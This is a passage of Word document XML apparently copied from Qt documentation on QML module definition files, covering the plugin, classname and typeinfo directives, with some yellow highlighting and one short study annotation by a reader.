              <w:t>, which is platform dependent; e.g. the library</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MyAppTypes</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>would produce</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>libMyAppTypes.so</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>on Linux and</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MyAppTypes.dll</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>on Windows.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
              <w:ind w:left="525"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Path</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(optional) specifies either:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
              <w:ind w:left="1050"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>an absolute path to the directory containing the plugin file, or</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
              <w:ind w:left="1050"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>a relative path from the directory containing the</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="2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color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>file to the directory containing the plugin file.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:ind w:left="525"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>By default the engine searches</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> for the plugin library in the directory that contains the</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>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color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>file. (The plugin search path can be queried with</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId297" w:anchor="pluginPathList" w:history="1">
              <w:r w:rsidRPr="002C2AE0">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QQmlEngine::</w:t>
              </w:r>
              <w:r w:rsidRPr="0035707C">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>pluginPathList</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>() and modified using</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId298" w:anchor="addPluginPath" w:history="1">
              <w:r w:rsidRPr="002C2AE0">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QQmlEngine::</w:t>
              </w:r>
              <w:r w:rsidRPr="0035707C">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>addPluginPath</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>().)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsid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lastRenderedPageBreak/>
              <w:t>Zero or more C++ plugin declarations may exist in the</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>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color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">file, however since plugin loading </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is a relatively expensive operation</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>clients are advised to specify at most a single plugin</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0035707C" w:rsidRPr="0035707C" w:rsidRDefault="0035707C">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Intbu what is plugin</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="00C472B3" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C472B3">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Example:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:spacing w:before="180" w:after="375"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>plugin MyPluginLibrary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2AE0" w:rsidRPr="002230B8" w:rsidTr="002C2AE0">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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">classname </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>++</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> plugin </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3663" w:type="pct"/>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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Provides the </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>class name of the C++ plugin</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> used by the module.</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 xml:space="preserve">This information </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is required</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> for all the QML modules that depend on a C++ plugin for additional functionality. </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Qt Quick applications built with static linking cannot resolve the module imports without this information</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2AE0" w:rsidRPr="002230B8" w:rsidTr="002C2AE0">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C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">typeinfo </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3663" w:type="pct"/>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C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Declares a</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId299" w:anchor="writing-a-qmltypes-file" w:history="1">
              <w:r w:rsidRPr="0035707C">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>type description file</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for the module that can be read by QML tools such as Qt Creator to access information about the types defined by the module's plugins.</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;File&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the (relative) file name of a</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>qmltypes</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>file.</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Example:</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typeinfo mymodule</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qmltypes</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Without such a file</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
